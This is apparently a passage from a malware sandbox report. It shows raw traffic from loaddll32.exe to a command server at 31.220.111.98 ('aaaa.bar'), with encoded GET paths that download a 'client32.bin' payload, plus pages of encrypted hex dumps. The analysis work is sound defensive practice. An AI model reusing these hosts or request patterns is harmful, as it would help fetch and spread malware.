                                                              2021-10-20 13:12:09 UTC915INData Raw: 48 09 14 d8 bf b2 ec 04 c8 3f fb 4a d3 80 06 f0 bd 59 db e6 a5 dc 23 c3 c4 68 50 2b c5 72 6b 51 b9 b6 5d f6 b0 8c e5 6c 92 cd 4f eb 84 b9 2a 59 c3 36 e1 e6 ff 74 17 e2 17 9f 76 48 e1 10 c3 10 20 de 74 a3 61 05 3d 18 af ac d1 94 a7 dc dc 5f f5 ba 05 9e 73 7e 12 fb c3 d6 e6 b3 38 19 98 c6 03 29 3f e2 e7 9e 10 4f f5 6c 76 05 ad a2 46 50 82 ef cd d6 8c 0e b7 d4 7a 83 0b da 2d 3f 56 17 a1 34 c0 54 e5 30 ea 5b 21 4d d8 8f 21 be 07 db 0b 89 d7 cf 77 3b 02 38 71 1c 1f 9b 78 8e 6f 9b b0 e6 1c 94 9b b3 54 21 79 3e 7e 33 82 21 be 10 b5 61 81 24 d9 8a 08 f5 e7 50 bd 70 de 91 53 e6 73 d6 c6 19 5e 05 39 ca aa 07 24 5b aa 6c 8c 1d 89 d8 40 d1 82 e6 df 9e 85 6d c2 2a f3 5b 6b a5 60 05 cd cf 4f 2c bf c1 14 5d d9 66 4e 14 99 c2 6a 73 24 a6 b0 d9 6e 5b 0c a9 73 a8 5e db 86
                                                              Data Ascii: H?JY#hP+rkQ]lO*Y6tvH ta=_s~8)?OlvFPz-?V4T0[!M!w;8qxoT!y>~3!a$PpSs^9$[l@m*[k`O,]fNjs$n[s^
                                                              2021-10-20 13:12:09 UTC930INData Raw: 9d 93 c7 ee a4 f6 76 97 81 b0 53 2e b9 4a d2 2e 0e d1 f0 42 c8 99 45 c3 4f 1b 82 3a 6c 44 b1 d0 4e 60 68 0f ca aa 59 27 0d 82 44 0f 0e d8 6c a5 f2 5a 2b 34 51 0c 9e c0 fe 2b 71 00 27 20 0e 37 af 8d a3 95 5f 9b 29 c9 d8 35 b8 2a 66 d5 20 3a 90 9c 22 7b b6 ab 88 6e 32 bd 60 33 05 b1 67 f0 a8 e4 ca 6d 9d 0e db 05 ea 8c cc aa 2a b6 75 21 e3 ac 76 51 cd be e0 2d d9 17 8b f7 c2 2d a6 66 e0 ad f0 fe d4 f9 06 9d 93 f2 9f e0 ab 3b 40 70 f7 be 38 ab b5 b6 ee f6 ee 83 bf 4c 8e d3 35 32 fd e9 f1 8d 4d ac 91 22 ad 48 0d 4e 9f 67 4d 93 75 8c 40 39 88 5f 8f c3 b6 ae c1 b3 77 07 58 4a 8e 45 b8 47 ae 5c de 2b ed eb 0d 10 0f ba a7 6a 62 62 23 12 29 2e 35 bb bc 51 44 0b ef 76 63 8f e0 b2 0f bc 50 7e 3e cb 02 20 8c 8d 42 4b 38 46 53 8e 6d f4 f8 e2 95 21 09 75 23 20 5f af b7
                                                              Data Ascii: vS.J.BEO:lDN`hY'DlZ+4Q+q' 7_)5*f :"{n2`3gm*u!vQ--f;@p8L52M"HNgMu@9_wXJEG\+jbb#).5QDvcP~> BK8FSm!u# _
                                                              2021-10-20 13:12:09 UTC946INData Raw: 3e b5 30 97 fa 16 ce dc da ed f8 bb 1c b3 d7 33 42 62 26 04 50 c9 ae a2 8a d7 0c bd 59 fa 3d b7 94 9e e8 25 4b 9b 40 be 76 e8 3a ad 03 7f 12 a2 78 80 35 36 16 85 39 d8 c9 f0 3c 10 35 d3 2b 07 8d 44 02 38 bc e6 85 7c e7 8b b7 25 8b 79 c8 7a ee ee 1b cc 72 06 c8 2a e0 17 a1 c7 c5 41 68 75 09 b1 c5 32 0b 5e 03 01 f6 3b cc 77 07 e5 6f 4d 51 1b 95 cb 1d 16 30 1a 06 c1 a5 cd 08 a1 b6 f6 26 4e ba f8 a2 49 2c 1c 43 76 d1 a5 c5 47 99 6e 05 bd a7 1e c6 e6 03 94 f4 ad be 58 f1 71 89 43 63 13 8a 1e 32 e4 a8 18 93 ef 2e ba df ab e9 4a d2 fa d6 04 09 ea c4 5f 8b 7f 3d 5b 34 da 69 e0 c2 25 12 36 56 84 e8 0d c5 0c da eb 25 6e 41 a4 06 88 94 49 21 bb ee c0 23 70 60 51 b2 1c 2a 91 f0 36 d2 dc 76 ff c1 98 7d db 35 a6 03 f4 49 15 d9 c4 81 fd f6 5f 7d 0f 67 9e d1 54 05 f8 7f
                                                              Data Ascii: >03Bb&PY=%K@v:x569<5+D8|%yzr*Ahu2^;woMQ0&NI,CvGnXqCc2.J_=[4i%6V%nAI!#p`Q*6v}5I_}gT
                                                              2021-10-20 13:12:09 UTC963INData Raw: 50 1e 0b ac 4a ce ee 01 c3 32 96 1b bd 04 f7 0a c8 3b 88 1e e6 d3 b0 de 5c b7 76 9f 20 66 82 13 55 7a 3e 5c cb 79 14 ab 5c fa 96 18 e5 67 d2 19 90 78 9f ee 30 8c f1 3f 2e d6 ec ba 9a 6b f8 da 05 d4 37 52 8b a3 0a 1a 19 05 0a e7 5a 88 00 8b 2a 36 08 41 f9 1b e9 97 d2 26 0c 97 de f7 ed c6 73 ab d5 8a 06 ef 27 be 0a 4e c3 0a e9 be 5a 6f ac a9 19 20 98 07 51 2b 13 07 36 be 09 b9 b7 41 1a 66 56 b6 b1 3a ac 8f cb 62 3b fa 4f 63 78 a8 29 6c 69 cf 83 6b a1 a1 d5 9f 98 f7 51 83 7c c3 25 cb 56 a3 1a ed 3c 71 bf 38 00 08 af db ca ee f7 a8 d4 e4 9d 6a c1 40 23 50 7b 4c 57 46 6b c0 32 7e c6 7f ed 56 ba 66 2f 2a cb e1 7e b2 be 9e 61 5c ec 0c f3 b4 44 15 72 4b 72 d5 74 52 32 24 1b 01 72 73 3a 2d cc 39 53 67 ce c3 46 2f b5 04 d2 76 50 fc 1f 74 13 2b 4b bf 91 37 05 27 c4
                                                              Data Ascii: PJ2;\v fUz>\y\gx0?.k7RZ*6A&s'NZo Q+6AfV:b;Ocx)likQ|%V<q8j@#P{LWFk2~Vf/*~a\DrKrtR2$rs:-9SgF/vPt+K7'
                                                              2021-10-20 13:12:10 UTC979INData Raw: 14 89 b0 b4 78 16 cb 9a d1 b4 2b 9a 06 d1 06 1a 64 a3 10 4c ce 3a 8a 60 7c 73 b2 8b 7e 79 af a2 dc d1 6f 54 60 79 9f f4 96 38 4f 3b 0d 9e 31 ea c1 4b 1a c1 40 09 64 af 88 bc 54 18 ff 22 1f c7 04 06 86 79 fb 40 18 e4 1a 1f 36 a5 9e 94 ba 5f b7 60 6a 56 6a 8d 1c a6 41 53 d8 ca c6 a4 5a aa 51 ab a7 27 00 4d e4 3b e8 81 18 ba ea 8e 7c 6e 65 4d a1 a0 1c 3f bf 81 27 c8 85 c0 08 e9 ee 06 c9 47 cd a4 58 3c 71 b2 83 94 31 1c 7f a7 b3 c7 68 34 ff 5e 29 23 a3 8c a1 21 90 5b 3d 77 c6 bb 48 39 f2 a4 c2 e2 4f 7c 9d 9c 0c c3 9d fe 5c 92 64 89 a1 d0 fa a3 75 d7 55 4c 6a a7 d1 94 d1 8f 1c 3e a2 09 ac 7b 60 d0 83 ad 42 4e ab ec 59 29 0a 2a 1f e9 60 95 6c 49 ea 7a 2e 96 60 81 72 16 79 a5 4d 7e 07 06 45 08 e2 6c 71 c5 eb 61 b2 5a df 0a f4 6f e7 bc 9d 8d ea 30 3e 9a 93 94 da
                                                              Data Ascii: x+dL:`|s~yoT`y8O;1K@dT"y@6_`jVjASZQ'M;|neM?'GX<q1h4^)#![=wH9O|\duULj>{`BNY)*`lIz.`ryM~ElqaZo0>
                                                              2021-10-20 13:12:10 UTC997INData Raw: b3 89 01 8c fe ba 6b 9a 67 71 00 b5 fc 2a 36 f6 da c3 1f 71 26 a8 a4 a7 99 49 ad 9f 98 07 72 49 d2 42 4f 4b 87 6e fc 54 5a d2 8f 20 8e fd 64 5e a3 fa e8 e8 a4 2e 96 44 4b 9f 5c e0 da 8c 65 de 38 cb 99 b5 c2 61 3c 10 58 fc 70 45 b9 22 4e b7 0c b7 aa 95 18 05 da 73 ba 96 45 67 6f 1f 8f 3f a4 c0 f4 27 8f 3c 74 87 ac 75 a4 60 40 a2 47 b6 95 62 ae 8a 02 b6 4f 82 4b ae e2 3e aa 89 2a 8a 73 f3 50 96 97 34 7c 13 4f 6e 83 a3 fc 70 a0 d7 d6 2c ab 65 52 59 08 89 4f 9a 41 3a 75 93 17 32 49 b9 4b ad 60 1e 6f c0 08 dd 14 90 45 75 08 25 ed 73 d2 81 6d 12 83 b7 69 3f 61 14 79 65 db e6 0f 88 64 ea f0 54 e9 eb 31 05 70 d4 a0 5f a9 81 74 60 32 79 cd 93 54 32 09 45 9e 7b e7 12 05 3f b1 da b3 7a 35 5c 61 d6 43 6b ee 2f 39 9c 36 e7 db 22 cb aa f7 db 71 81 aa 8f 36 32 9d ea 04
                                                              Data Ascii: kgq*6q&IrIBOKnTZ d^.DK\e8a<XpE"NsEgo?'<tu`@GbOK>*sP4|Onp,eRYOA:u2IK`oEu%smi?ayedT1p_t`2yT2E{?z5\aCk/96"q62
                                                              2021-10-20 13:12:10 UTC1013INData Raw: fa f6 33 1b b6 39 49 89 e2 64 a4 95 a1 ac b1 b1 0a 42 b2 10 f8 d8 01 53 9c f7 3c ad 2d 4c 84 3b 72 ce 23 df 17 cf 5e 3e cc b4 61 04 c5 52 ab a7 b2 2b 23 54 1d 1a 01 d4 36 2d 3d ae b0 1e 7b 7a ff 48 9c 28 cc da a6 c0 95 ae 62 af d0 74 b3 cb c6 21 de c0 d7 df bd 9a 7a 14 43 58 00 36 9a 60 23 b8 7c af 09 42 b2 a5 fa d6 c1 6d 92 75 e0 22 a8 96 df b7 e3 7d 27 07 b8 30 01 e4 79 d4 29 b4 86 db 90 69 34 61 8d e2 8c af 36 2d 33 64 ee a8 62 a9 96 05 7b 22 d8 8a 22 1e af 8b d8 6e 6f 6a c3 e8 88 e5 d1 12 3c 6b 99 75 9d 62 8a 2b 40 95 20 fa b1 07 ae 20 d2 79 58 97 3a 01 cb 67 c5 61 e8 a0 3a b7 91 7a e4 de 6f 0e 67 7f 0b ba b4 43 63 12 a3 91 7e b2 0c 86 68 83 9a ec 19 98 b1 9f e8 39 50 b5 06 3e 1d 85 a3 c9 f5 ed fe b2 27 dd bd 52 a6 0e b9 ca e3 0c 42 0c e5 3d 29 83 63
                                                              Data Ascii: 39IdBS<-L;r#^>aR+#T6-={zH(bt!zCX6`#|Bmu"}'0y)i4a6-3db{""noj<kub+@ yX:ga:zogCc~h9P>'RB=)c
                                                              2021-10-20 13:12:10 UTC1029INData Raw: 6d cb 2f 68 18 60 2d 77 7b 30 3e f7 16 cb 06 0d ed 04 7c 58 12 ba 32 5b 9c 9a 7f d7 f9 f0 4e 8c 00 db dd 67 2a 90 2f 32 dc 27 d5 61 ce ab bf d6 11 fb ef a4 b2 59 d5 28 f8 cc 9e 5b 36 91 89 3a c4 10 e4 8b 1a 17 a1 ed 0b 5c 99 35 16 ad ed 6f 90 d8 d7 f3 60 b0 68 74 65 75 fd 9e b5 f7 8d 71 5a c7 ed 4f 3e 44 aa de 1f a0 35 1b 8b 00 6b 03 a7 d8 ac 64 af 04 98 af 4a aa 76 d0 90 99 69 1b 71 f1 60 33 4d c3 20 1a b6 a7 46 bb bd 33 07 92 09 47 ae a6 bb 51 19 18 c4 dd e6 5c 04 cf f3 b4 72 34 23 5f 4c 52 b6 30 bd d2 e6 d6 f2 ba de 47 d3 cb 25 0d b2 0a 7e 6b f1 1c e6 81 33 c1 ef ae 35 8b 35 f4 a1 56 97 2f c6 5c 72 0b 1e 9d ef b1 8c 20 0a fe 42 f2 64 5c 0a 96 17 f8 e6 06 40 c1 fe 3d f2 fe e8 40 42 e0 a3 ee a5 99 9e 5e ea e1 53 5a 05 0a 63 50 73 58 e5 6f 13 d1 72 88 a1
                                                              Data Ascii: m/h`-w{0>|X2[Ng*/2'aY([6:\5o`hteuqZO>D5kdJviq`3M F3GQ\r4#_LR0G%~k355V/\r Bd\@=@B^SZcPsXor
                                                              2021-10-20 13:12:10 UTC1045INData Raw: 53 62 ae a3 d9 7e 7d c3 98 68 9b fd 89 49 70 57 0e eb 52 29 d6 62 e9 f2 1d 7c d2 46 2f a4 96 33 f6 b6 b3 94 d7 30 63 04 db fb 60 4d 2c 82 18 01 17 89 2f 44 0e 4f 7f 5f b2 79 c7 f3 f9 88 ad 5e 15 d3 3f c9 fd 72 fd 77 87 17 60 75 f8 85 83 6b bc 96 51 7a 33 23 e7 bf aa f3 5c 3e cd f2 10 54 d0 c5 f8 aa 0d c9 05 d8 c3 6c ef 6a 00 de 77 81 77 d9 fa d9 93 71 85 14 dc f0 13 ff 87 f6 7f 1d 3c 3d 29 77 97 16 13 13 fa e5 8b e9 c9 c1 ad 5c 0d a5 b7 be 11 a6 85 a8 5b 1b d8 ae e7 85 ff e8 46 47 ed a1 40 b2 bc 1a 82 fc d0 9c a8 32 b7 dd 06 cf 50 34 72 6b 24 ad d7 ec e0 ac 79 27 1e 9d 26 e2 1e c2 42 2a e8 eb 49 33 b2 8f ad b7 7c 81 79 73 6f f8 af d3 6b 80 7c e1 13 21 f7 60 0b e0 ff 59 a0 f8 81 3e 7f 44 55 87 59 5e 53 c0 3a 96 a9 09 3d 45 f0 e4 5b b7 1d c6 5d 47 01 ed a4
                                                              Data Ascii: Sb~}hIpWR)b|F/30c`M,/DO_y^?rw`ukQz3#\>Tljwwq<=)w\[FG@2P4rk$y'&B*I3|ysok|!`Y>DUY^S:=E[]G
                                                              2021-10-20 13:12:10 UTC1061INData Raw: 5b a1 00 c6 64 27 d0 af 5b e1 4c ed c1 71 6f 5b f5 7b 94 53 8c e5 92 1e b4 2f 7d 8d c5 5a e6 ac 0b 6e f5 0d 40 99 f2 a5 d4 40 d4 71 e9 23 2c 40 bb 6f eb 96 73 0e f9 51 c8 63 9d 33 49 0c 31 7e 88 5c 3e 3c 15 f7 97 48 32 f8 2b e6 fb 88 1a e0 38 e7 13 58 63 9d e7 80 c5 f0 3e ba 91 42 0d 7f cd e9 0d ca e3 e1 81 57 f5 94 7b 71 2f 6d 7c b4 2a f7 6e 85 74 50 94 a5 43 c7 77 00 5e b4 6a c4 a9 37 d4 dc 5f b2 55 b9 d9 f4 e1 81 94 56 02 73 a8 36 b4 9e 4c 53 32 2c 31 20 01 8d c0 58 2a fc df b0 40 cf c3 6e e0 e3 b2 9d 67 10 e6 39 cc 37 2e 73 f7 4d 50 e2 6d 58 bd 3a 55 df 58 64 a3 a7 0b 6a d4 6e a1 4d 01 38 6c 37 62 fe 10 18 92 15 6c d7 7a 2b 46 28 01 c7 58 63 82 80 26 be a3 71 09 9d a3 02 22 2a 19 a5 30 a2 08 40 9a 1c 4f 78 9e 17 cd 38 fe dd 3c 7f 14 42 23 ca 13 19 6e
                                                              Data Ascii: [d'[Lqo[{S/}Zn@@q#,@osQc3I1~\><H2+8Xc>BW{q/m|*ntPCw^j7_UVs6LS2,1 X*@ng97.sMPmX:UXdjnM8l7blz+F(Xc&q"*0@Ox8<B#n
                                                              2021-10-20 13:12:10 UTC1077INData Raw: e2 dd d8 1c c8 ef 82 c0 af 65 b2 ce cf 9b cd 9b 52 a1 f8 80 fe e4 7d a5 36 12 88 cc 61 8a 33 bd 39 e6 58 9f 50 01 1c 4d 01 b4 eb 19 a5 a3 ec 06 45 14 c2 d5 47 4e f9 a8 14 fc a6 64 43 36 fb 29 34 85 de d6 b9 f8 bc 81 aa ee fb 1e e6 d0 7e 0c 8e 4e b9 31 0c 12 af e9 e6 fd 22 d2 c6 50 16 a6 02 1d 7a f6 2b d3 46 07 4f e6 73 ed 53 38 c2 58 45 28 58 3a b1 f6 c3 18 df 96 8a 6f 7e ff 15 c1 12 a6 b6 ac 7f c1 0f ac 94 31 88 b8 1f 5f 74 d9 63 e1 94 11 49 c3 dd 20 d2 c4 78 26 12 f1 60 73 6d 29 bf 09 38 72 79 07 13 3c 13 08 1e 76 10 10 55 a4 fc d1 65 f1 a9 7a 28 bd a7 c6 2e ce 43 31 2e 3d 3b b4 7f b0 2e b5 1b 6c f5 84 98 81 e2 31 55 d2 a7 40 7e 40 c4 a8 e0 2e f9 ef 8c 00 21 f5 26 dd 7c 76 30 ba 5a 76 4f d3 3c 6a e2 da 0f 7c 14 76 42 02 d0 a6 c3 58 3a 01 7c e3 74 fa bc
                                                              Data Ascii: eR}6a39XPMEGNdC6)4~N1"Pz+FOsS8XE(X:o~1_tcI x&`sm)8ry<vUez(.C1.=;.l1U@~@.!&|v0ZvO<j|vBX:|t


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              16192.168.2.54996531.220.111.98443C:\Windows\System32\loaddll32.exe
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:12:09 UTC962OUTGET /jdraw/NO7gR0KTty/Oqx9aKgxsT2Y54eU9/T_2Fq68MoL8B/sVtG7ExwGuN/2b4WQXmrNjZqxz/IsPGuUpM_2FQweZHv_2BB/qSCYCr2zsOkbh38r/It4yIHc8jFLoOJQ/k2WdhsET8UEtCwKWoz/qKONYcQpl/QBJ1lUtsdnk2R51rdvsn/Du_2F_2Ftub4vOTuIOX/47sdvY8Q/mQd32Pz7EA_2F/N.crw HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                              Host: aaaa.bar
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Cookie: lang=en; PHPSESSID=lsnqfh754hfkcfkt83tqpqmdf3
                                                              2021-10-20 13:12:10 UTC995INHTTP/1.1 200 OK
                                                              Server: nginx/1.10.3 (Ubuntu)
                                                              Date: Wed, 20 Oct 2021 13:12:09 GMT
                                                              Content-Type: application/zip
                                                              Content-Length: 1849
                                                              Connection: close
                                                              X-Powered-By: PHP/5.4.16
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: public
                                                              Pragma: no-cache
                                                              Content-Transfer-Encoding: Binary
                                                              Content-Disposition: attachment; filename=client32.bin
                                                              2021-10-20 13:12:10 UTC995INData Raw: 22 1f 12 32 d8 c6 ba 35 1b ff 2a a8 1c 15 83 72 b3 16 30 ce 8b f2 94 08 32 b5 de 35 dc 20 3e ac 5d 96 4d c1 42 3b eb 46 b9 92 bf 30 9f d0 97 f7 68 13 8c 4f ec d3 8c 98 37 3b 38 0c 51 23 b9 f0 b7 b7 68 ff 4b ce a9 e2 e3 0a fb e3 28 6e 38 b4 86 ed 03 1a b9 b3 8d e3 35 69 c2 0f bd f8 60 4a 2a ba b5 be 77 d8 2c 7e 54 ea b0 d2 c4 21 2c 2f 64 67 78 04 20 fb f5 b4 13 84 8f 93 92 a9 da b7 b0 d8 c4 f3 26 b2 9b 6b d4 41 a2 c0 2c 65 66 7d 01 c0 92 8f 3e be 38 e1 5d 3b d7 0f a8 6f 1f 17 e3 68 76 c4 94 df 75 68 dc cf b3 96 d9 68 a9 37 d4 9e 63 ee b1 03 af 8a 98 78 93 81 67 51 05 29 ae f7 06 1d 8d 12 90 f1 82 ea b8 3a bb 3b 1a 73 ab 17 ff bb 0a ba a1 e4 5b 0f 0d b8 1e 90 30 67 3c 7b 7f 44 09 be 0b ee fd 94 d7 8d fb 6a e7 6f b3 40 4c 70 ab fe 15 b8 b5 c7 e8 0d 01 1a 59
                                                              Data Ascii: "25*r025 >]MB;F0hO7;8Q#hK(n85i`J*w,~T!,/dgx &kA,ef}>8];ohvuhh7cxgQ):;s[0g<{Djo@LpY


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              17192.168.2.54996731.220.111.98443C:\Windows\System32\loaddll32.exe
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:12:10 UTC1092OUTGET /jdraw/6ybu_2FNdKF0gG/m7orpeXdQJjdHGv7mDMIL/JfKVVeTDKq1gaDX7/GcXqJLlu546KZ6e/n4P4OzwLSG43PTmkn1/t0lauqlYi/uThwI2_2Bb89U_2F9plY/Zxq7QGyY_2FF4AUNHAt/i342YI4jYPKMWYQUn0qvUq/ia1VXOlbfvfYW/_2BuG_2B/Dlgb1sPi5LA4l6opVIFmhDT/0Z5HvD.crw HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                              Host: aaaa.bar
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Cookie: lang=en; PHPSESSID=h4s0ka612qu3hrcshs8hb4ig95
                                                              2021-10-20 13:12:11 UTC1092INHTTP/1.1 200 OK
                                                              Server: nginx/1.10.3 (Ubuntu)
                                                              Date: Wed, 20 Oct 2021 13:12:10 GMT
                                                              Content-Type: application/zip
                                                              Content-Length: 227913
                                                              Connection: close
                                                              X-Powered-By: PHP/5.4.16
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: public
                                                              Pragma: no-cache
                                                              Content-Transfer-Encoding: Binary
                                                              Content-Disposition: attachment; filename=client32.bin
                                                              2021-10-20 13:12:11 UTC1092INData Raw: 7a d8 e7 e8 5a b1 41 33 b2 bc 98 a1 2d 68 13 0f 97 e9 11 38 74 e6 87 20 80 55 24 d2 32 ca b0 b5 fb ef 70 18 d4 d5 42 17 72 8e d5 2f 06 81 8a 8a 11 9a ce 93 c7 7d 46 ec 89 6f b9 08 6e f3 e9 5b bb 4a 79 2d ee 4e f7 bd 61 1f 44 cd 0a f7 36 20 5a 91 04 8e c1 33 8f f7 b1 d2 4e a6 0c 00 cd 68 f5 3a 14 99 e6 2b 34 95 d5 f2 e2 94 d4 0c 25 ae 18 03 78 09 8e f0 c5 6d 1b ab 49 c1 ad 79 81 48 e4 18 22 57 b8 52 0d 2c 28 17 6f a0 8b 55 5f 4b b3 ff 20 9e 5b f8 e2 dd 1a 3f da c4 ce aa 67 12 2e 97 13 2a f0 f8 b1 ff f1 e6 74 f3 a8 1c c9 9e ed 04 cf 21 b7 dc 2c 23 07 33 02 1b f7 d2 cc 06 e3 d7 20 04 e5 45 b7 db 43 76 2e c6 52 d0 4e d3 fe f7 73 59 44 33 b9 94 7e 52 1a 0f 88 95 66 09 0b 79 84 05 4d 1f b8 a4 eb 7b 33 8a 20 c9 4a 1a 36 2a 02 4b 45 ec 8c 07 04 f7 14 d0 74 ce ec
                                                              Data Ascii: zZA3-h8t U$2pBr/}Fon[Jy-NaD6 Z3Nh:+4%xmIyH"WR,(oU_K [?g.*t!,#3 ECv.RNsYD3~RfyM{3 J6*KEt
                                                              2021-10-20 13:12:11 UTC1108INData Raw: 2e 4a 31 ca f3 2b be 89 95 34 73 d7 cb 0c 35 50 c4 f1 24 68 8b 88 fc e3 a7 a4 41 86 f8 78 72 ba 2c 90 c1 e3 b3 fd cc d2 05 5c b3 e9 df 42 3a 66 1d 3d 9c 30 db dc 67 7b ab 0a 63 9e 99 3a e3 34 02 9b e3 c3 2a 8e 7b 0a 0e d6 b3 13 54 08 d7 62 5c c8 8a f5 3f 45 1a 48 f9 ef 9c 14 54 a6 b4 3d 2e 56 59 e6 16 5b 29 3c 7b 64 d9 3f 07 fa 80 0a 6a b7 ba 82 65 f6 e2 03 5c 3f 54 5c a2 73 0f 30 1a 81 cf 8b e6 ab e2 01 73 0f 1e 18 75 ad 97 26 cb 15 de 15 d6 48 cb 51 79 8f 3f 63 7b 8f f1 92 43 f0 4f 57 de 6c 4e ad b8 1f f6 47 b9 a2 d8 bc 92 4a 95 19 03 62 3c 8d 67 62 d1 80 db d2 f7 06 37 5c 0f 39 52 04 32 b5 99 20 0e ee 13 87 8f c5 e1 15 23 87 6f d4 a4 3f ae fc ef 14 81 fd fb 27 56 6a a0 df 16 76 77 a2 ca c9 af bc ab 64 2a 89 5d 62 98 bf bb 00 02 3f e2 68 b0 35 6a ef 7e
                                                              Data Ascii: .J1+4s5P$hAxr,\B:f=0g{c:4*{Tb\?EHT=.VY[)<{d?je\?T\s0su&HQy?c{COWlNGJb<gb7\9R2 #o?'Vjvwd*]b?h5j~
                                                              2021-10-20 13:12:11 UTC1124INData Raw: 1b c5 c1 52 5d e8 1b 9f 71 ab 0e 0b 8a 06 41 d0 4e b2 cb 38 c5 78 ca 47 e5 5b 37 6b 00 6a a2 3b 43 82 0b 40 3b 9b d6 a7 5c ba 97 be 1f e7 ee af 71 bb 24 48 79 84 77 57 bc ab 4e bb f7 97 e6 e1 0d 53 9e f0 14 bf 31 5d 58 05 68 f2 a0 17 71 1c ad 45 3f ae c8 bc a5 aa 93 eb ba c8 a7 67 ac 5c eb d9 b1 07 eb 5f 17 c0 18 44 0c f2 3d e5 81 b3 8a 93 07 8c a4 fa 37 bc 6f 4c a1 a0 6e 28 50 74 08 0f 4a 51 66 bb b7 f9 2f 6e 3c 71 74 ff d7 8c 9e b5 56 56 9c a7 22 d5 d7 29 76 b5 2e e9 c9 bb bc 74 89 5e 8b 63 a9 b2 5f 63 13 02 9c 34 83 60 13 85 42 2e a4 07 d3 64 e0 bf ec b0 74 b5 5d 30 8f 37 aa b8 eb b6 97 ef d8 c1 41 32 84 02 bf c5 59 16 51 c4 c9 d5 e2 66 32 ef 4b ab 59 9e 90 a0 d8 db c6 fb 78 77 d3 df b2 65 22 a3 66 bb 19 18 43 48 26 2f b4 dc 7b 68 0d 6e 34 d8 2b d0 43
                                                              Data Ascii: R]qAN8xG[7kj;C@;\q$HywWNS1]XhqE?g\_D=7oLn(PtJQf/n<qtVV")v.t^c_c4`B.dt]07A2YQf2KYxwe"fCH&/{hn4+C
                                                              2021-10-20 13:12:11 UTC1140INData Raw: 5f 7a 9f 35 09 63 55 53 bb 4b 41 13 f0 91 f8 0a 07 60 7b f7 55 83 b4 a5 17 86 71 27 6b 8d 18 72 f9 43 15 c2 61 8b 60 90 27 e9 c9 13 a2 a0 63 2f 4d 2a 03 5a 41 7f 9f ab 65 f3 69 ce 1b 35 41 db 34 ea eb d6 9d 9f 13 e8 da 77 03 6a d8 e8 da 4f 0b 2b 13 51 a4 96 a7 47 32 59 77 45 0e b9 1f 3f 73 be 78 a0 8b a6 2d 08 2a 52 36 5b 9d ee c1 d3 49 99 23 d5 5b a7 75 83 e2 18 23 e6 f1 ea 0d 54 aa 2d c6 ee 57 34 e5 fb 67 f2 4b 03 93 72 06 90 b3 b6 3e 4b 0d a4 7f 44 69 e4 dc 3f 91 e0 72 6e 51 e4 59 b9 2d 88 6f 71 75 62 c4 aa f8 c6 f9 3f f1 7f cc f0 29 ea 89 7c 41 40 97 26 1c d1 5a 80 46 a4 7e fd 7b 04 0b 75 65 21 25 9a 05 08 e6 80 cc 1a 48 15 cc c7 14 c2 d7 ab bb 00 83 16 00 d3 4e 21 b2 50 29 94 10 54 24 aa c8 23 81 b3 16 c0 fd de fd 17 01 de 7a 04 d1 0f d1 52 69 97 78
                                                              Data Ascii: _z5cUSKA`{Uq'krCa`'c/M*ZAei5A4wjO+QG2YwE?sx-*R6[I#[u#T-W4gKr>KDi?rnQY-oqub?)|A@&ZF~{ue!%HN!P)T$#zRix
                                                              2021-10-20 13:12:12 UTC1156INData Raw: f6 dc b3 15 4c d1 14 b8 eb 59 b9 e1 37 08 b7 e2 48 73 d3 5f 58 44 83 57 60 8a b5 ba 46 dd e5 13 b4 4b 9f fa b9 3b 16 57 c6 74 ba b7 ca ae da 55 18 25 a9 61 16 1d 54 de c6 0e 93 ad 72 af 8f 01 7f 9e e5 c2 30 ce 18 65 e9 8d 33 23 21 dd 90 99 be 5a 86 38 60 0a 64 5e c0 3c 9b 98 4a c1 8a ae e6 0b 47 ee 0b ba db c2 e3 cc 1e f2 82 cf 91 7a 59 09 fb 82 ef d3 2c 94 20 0d b3 b6 8e fe fd 12 23 d6 25 d3 1e 4c 5e f8 72 51 3b 5a 5c 95 64 a0 88 22 56 ba 5f d3 14 e8 00 66 ea fb 4f 45 b5 4e 9b 57 cf 89 c4 4e a6 c4 0f dd 04 48 55 f2 4d 05 24 24 c3 51 8a b9 48 c7 c6 d8 f6 c9 af f1 de eb 65 ff 4b 63 c3 ea a4 5d 7b 34 40 46 9d 9a 1f be f2 e5 78 ae 49 25 7f 4a 1c 95 15 02 ba 5f ad 1f 2e 56 d5 e7 19 6f de 86 4e d2 7b 7a de 6d f8 e7 dc 57 f5 23 81 91 3e ab 9d df bf 74 84 26 4b
                                                              Data Ascii: LY7Hs_XDW`FK;WtU%aTr0e3#!Z8`d^<JGzY, #%L^rQ;Z\d"V_fOENWNHUM$$QHeKc]{4@FxI%J_.VoN{zmW#>t&K
                                                              2021-10-20 13:12:12 UTC1172INData Raw: 20 bc 07 a2 70 0c ba 65 28 80 61 ab 01 b1 81 37 31 09 a2 a1 66 5c 85 4e 97 ed 5b 95 a8 9f 75 75 3d 68 61 73 f3 9a 62 84 80 1b 83 41 4d a0 6a 3c 97 8b d3 01 45 8e 7d cf 25 76 f8 60 d6 85 04 29 da f2 2a 6a f3 5c 61 19 53 6a e0 54 b4 c8 d0 3d ec b1 f6 a8 41 70 ee a4 81 45 ae cb e4 f8 8e 6b 38 06 eb 05 dd ba 7a af f5 35 93 6b 7d c7 2c 71 20 21 07 81 ac 0b 8d 58 e3 6b 10 c6 50 0f 13 ad a6 a1 48 72 94 7d dd ce 69 16 50 6f 88 bb 55 6f 6c 31 8b ed e7 4b ea a0 cf 38 71 e4 0c f9 89 79 21 01 d8 34 b9 1e 5e 00 38 24 6b ea be e2 59 48 44 b1 52 cd b1 4b f0 70 a9 f8 5e 59 be b8 eb c3 7f 82 9c 9a ff 12 47 93 09 c4 42 ba 07 90 86 13 79 cd e1 4f f3 2c cf e3 13 d4 63 f4 a7 c6 57 a3 a5 9b 80 40 43 ce 8d 9b eb 6e bd f6 db 92 35 b5 45 df 08 5a f2 df 84 f0 c2 9c 93 80 35 01 c8
